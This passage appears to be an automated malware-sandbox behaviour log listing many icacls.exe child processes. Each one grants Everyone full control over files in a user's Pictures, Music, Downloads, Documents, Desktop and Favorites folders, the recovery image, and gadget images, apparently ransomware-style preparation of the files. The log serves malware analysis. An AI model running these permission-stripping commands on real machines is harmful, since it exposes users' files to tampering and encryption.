  "icacls.exe" C:\Users\Admin\Pictures\DisableUnprotect.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:5264
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ExpandSave.svg /grant Everyone:F /T /C /Q
  2⤵
  PID:4188
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\GroupRestart.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:2264
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\GroupUndo.dxf /grant Everyone:F /T /C /Q
  2⤵
  PID:2976
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\MountSwitch.raw /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2236
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\NewUnregister.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:6316
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\OpenInvoke.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:2232
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PublishStart.svg /grant Everyone:F /T /C /Q
  2⤵
  PID:4312
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PushRedo.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6424
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RegisterRead.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6260
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RedoHide.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:4504
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PushSkip.dwg /grant Everyone:F /T /C /Q
  2⤵
  PID:2060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ResizeComplete.crw /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6220
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ShowLimit.jpeg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4140
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SkipClose.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:4744
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SyncSave.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:4840
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UninstallBlock.crw /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5336
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UnlockConnect.svg /grant Everyone:F /T /C /Q
  2⤵
  PID:6288
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UpdateStop.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:4792
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\WaitConnect.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:4104
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UseCopy.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:6256
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\Wallpaper.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:2032
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\AddSync.vsd /grant Everyone:F /T /C /Q
  2⤵
  PID:4212
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\AssertStep.wax /grant Everyone:F /T /C /Q
  2⤵
  PID:5584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ClearOpen.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:6420
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConvertToJoin.pot /grant Everyone:F /T /C /Q
  2⤵
  PID:4392
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\DebugCompare.cmd /grant Everyone:F /T /C /Q
  2⤵
  PID:4148
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\DenyInstall.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:4120
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\DenyRemove.svgz /grant Everyone:F /T /C /Q
  2⤵
  PID:3216
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\DebugSelect.scf /grant Everyone:F /T /C /Q
  2⤵
  PID:3384
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\BackupExit.3gp2 /grant Everyone:F /T /C /Q
  2⤵
  PID:2324
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\GroupRead.rm /grant Everyone:F /T /C /Q
  2⤵
  PID:4480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\JoinGet.jfif /grant Everyone:F /T /C /Q
  2⤵
  PID:6016
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\EditRestart.cfg /grant Everyone:F /T /C /Q
  2⤵
  PID:4048
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\LockEnable.wmv /grant Everyone:F /T /C /Q
  2⤵
  PID:5240
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\PingRepair.ppt /grant Everyone:F /T /C /Q
  2⤵
  PID:3760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\PushFormat.shtml /grant Everyone:F /T /C /Q
  2⤵
  PID:4328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ReadExit.dwg /grant Everyone:F /T /C /Q
  2⤵
  PID:5468
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ReceiveLimit.ps1 /grant Everyone:F /T /C /Q
  2⤵
  PID:5844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RegisterPush.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:3768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RenameApprove.avi /grant Everyone:F /T /C /Q
  2⤵
  PID:4932
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ResetDismount.vdw /grant Everyone:F /T /C /Q
  2⤵
  PID:5452
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ResumeExit.aifc /grant Everyone:F /T /C /Q
  2⤵
  PID:5020
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SendReceive.mpa /grant Everyone:F /T /C /Q
  2⤵
  PID:5724
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SearchFormat.raw /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6176
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\TraceWait.css /grant Everyone:F /T /C /Q
  2⤵
  PID:4164
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\UnprotectFind.dxf /grant Everyone:F /T /C /Q
  2⤵
  PID:5284
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\UnprotectFind.dxf /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4296
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\StepRedo.hta /grant Everyone:F /T /C /Q
  2⤵
  PID:2308
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\UnprotectFind.dxf /grant Everyone:F /T /C /Q
  2⤵
  PID:2216
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\UpdateFormat.ttc /grant Everyone:F /T /C /Q
  2⤵
  PID:2300
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\UpdateSkip.dot /grant Everyone:F /T /C /Q
  2⤵
  PID:2360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url /grant Everyone:F /T /C /Q
  2⤵
  PID:6236
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url /grant Everyone:F /T /C /Q
  2⤵
  PID:6624
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url /grant Everyone:F /T /C /Q
  2⤵
  PID:6280
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url /grant Everyone:F /T /C /Q
  2⤵
  PID:6132
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url /grant Everyone:F /T /C /Q
  2⤵
  PID:2344
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4528
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Money.url /grant Everyone:F /T /C /Q
  2⤵
  PID:3628
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url /grant Everyone:F /T /C /Q
  2⤵
  PID:6020
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN.url /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2464
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4204
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4200
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url /grant Everyone:F /T /C /Q
  2⤵
  PID:3348
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft Store.url /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6272
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links for United States\GobiernoUSA.gov.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Work.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4400
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links for United States\USA.gov.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4416
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links\Suggested Sites.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4372
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links\Web Slice Gallery.url /grant Everyone:F /T /C /Q
  2⤵
  PID:3744
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\AssertUnblock.mp2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\CompressCopy.3gp /grant Everyone:F /T /C /Q
  2⤵
  PID:4556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ConvertToUnlock.css /grant Everyone:F /T /C /Q
  2⤵
  PID:7116
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\DebugConfirm.3gpp /grant Everyone:F /T /C /Q
  2⤵
  PID:7020
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\DenyConvertTo.ps1 /grant Everyone:F /T /C /Q
  2⤵
  PID:6904
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\DismountDebug.kix /grant Everyone:F /T /C /Q
  2⤵
  PID:7008
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ExpandSwitch.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:6736
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\FindBlock.pub /grant Everyone:F /T /C /Q
  2⤵
  PID:6748
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\GetClose.otf /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6824
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\GroupSplit.mhtml /grant Everyone:F /T /C /Q
  2⤵
  PID:6768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MergeUninstall.rtf /grant Everyone:F /T /C /Q
  2⤵
  PID:7012
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\NewConvertTo.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1172
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\PingSend.ogg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1704
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ProtectLimit.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ResetExport.mp2 /grant Everyone:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ResetRead.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:656
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RestoreClose.rtf /grant Everyone:F /T /C /Q
  2⤵
  PID:3188
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RevokeGet.otf /grant Everyone:F /T /C /Q
  2⤵
  PID:548
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RevokePublish.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2968
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\SuspendResize.css /grant Everyone:F /T /C /Q
  2⤵
  PID:4112
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\TestDebug.mpeg /grant Everyone:F /T /C /Q
  2⤵
  PID:524
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\StepJoin.3gp2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:916
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\SaveResume.xltx /grant Everyone:F /T /C /Q
  2⤵
  PID:6392
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\TestGrant.jpeg /grant Everyone:F /T /C /Q
  2⤵
  PID:6216
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UndoClear.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1512
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UninstallLock.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:6168
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UninstallLock.dib /grant Everyone:F /T /C /Q
  2⤵
  PID:1360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\AddApprove.txt /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:744
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\WriteFind.odt /grant Everyone:F /T /C /Q
  2⤵
  PID:3368
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Are.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:6484
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\CopySuspend.htm /grant Everyone:F /T /C /Q
  2⤵
  PID:3356
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\DebugAdd.ppsm /grant Everyone:F /T /C /Q
  2⤵
  PID:3352
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\DismountUndo.dotm /grant Everyone:F /T /C /Q
  2⤵
  PID:4992
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ExitTrace.vstx /grant Everyone:F /T /C /Q
  2⤵
  PID:4976
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ExpandReset.potm /grant Everyone:F /T /C /Q
  2⤵
  PID:5916
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Files.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:3920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\MountInstall.ppsm /grant Everyone:F /T /C /Q
  2⤵
  PID:3856
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Opened.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:3364
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\PopMove.ppsx /grant Everyone:F /T /C /Q
  2⤵
  PID:2012
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\RedoUnregister.doc /grant Everyone:F /T /C /Q
  2⤵
  PID:5920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Recently.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:6644
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ProtectDeny.vsw /grant Everyone:F /T /C /Q
  2⤵
  PID:928
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\RenameUndo.htm /grant Everyone:F /T /C /Q
  2⤵
  PID:6688
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ResetRestore.rtf /grant Everyone:F /T /C /Q
  2⤵
  PID:4936
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\RevokeSend.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:2328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SaveReset.xlsb /grant Everyone:F /T /C /Q
  2⤵
  PID:2568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SendDismount.vssx /grant Everyone:F /T /C /Q
  2⤵
  PID:6692
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SkipCopy.xlsb /grant Everyone:F /T /C /Q
  2⤵
  PID:3512
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SplitWatch.vssm /grant Everyone:F /T /C /Q
  2⤵
  PID:4960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\StartLimit.potx /grant Everyone:F /T /C /Q
  2⤵
  PID:3508
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\These.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:3984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UninstallMeasure.xla /grant Everyone:F /T /C /Q
  2⤵
  PID:2316
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UnlockFind.xlt /grant Everyone:F /T /C /Q
  2⤵
  PID:1252
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\AddUnregister.ppt /grant Everyone:F /T /C /Q
  2⤵
  PID:5932
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConvertExpand.wmv /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3988
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConvertFromDisconnect.xps /grant Everyone:F /T /C /Q
  2⤵
  PID:3632
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConvertFromDisconnect.xps /grant Everyone:F /T /C /Q
  2⤵
  PID:6604
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\GetDismount.mpe /grant Everyone:F /T /C /Q
  2⤵
  PID:7040
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\GetLock.pot /grant Everyone:F /T /C /Q
  2⤵
  PID:2764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\JoinConvertTo.htm /grant Everyone:F /T /C /Q
  2⤵
  PID:2512
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\MoveEnter.pptm /grant Everyone:F /T /C /Q
  2⤵
  PID:3584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ReadSuspend.easmx /grant Everyone:F /T /C /Q
  2⤵
  PID:5736
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\MoveExpand.mpeg2 /grant Everyone:F /T /C /Q
  2⤵
  PID:3084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ResizeSend.pdf /grant Everyone:F /T /C /Q
  2⤵
  PID:2608
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\SendTrace.pot /grant Everyone:F /T /C /Q
  2⤵
  PID:2408
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\SkipSave.wav /grant Everyone:F /T /C /Q
  2⤵
  PID:2936
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\SubmitEnable.vst /grant Everyone:F /T /C /Q
  2⤵
  PID:3044
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\SubmitSend.contact /grant Everyone:F /T /C /Q
  2⤵
  PID:436
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\SuspendRegister.svgz /grant Everyone:F /T /C /Q
  2⤵
  PID:3896
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\SwitchComplete.xps /grant Everyone:F /T /C /Q
  2⤵
  PID:4016
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\UndoTest.snd /grant Everyone:F /T /C /Q
  2⤵
  PID:4836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Contacts\Admin.contact /grant Everyone:F /T /C /Q
  2⤵
  PID:5796
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Recovery\34107922-98a6-11eb-a15f-ea91f6580701\Winre.wim /grant Everyone:F /T /C /Q
  2⤵
  PID:4820
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\drag.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\icon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3008
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\logo.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5148
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3424
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\10.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4788
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1080
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6364
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\16.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5712
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4796
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2168
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5024
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1px.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:6796
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\2.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3428
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5104
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\22.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3020
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5956
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\26.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5092
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\27.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2832
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2228
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\28.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4676
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\29.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2636
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\3.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2872
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\30.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2900
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\31.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4424
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4880
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\33.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4644
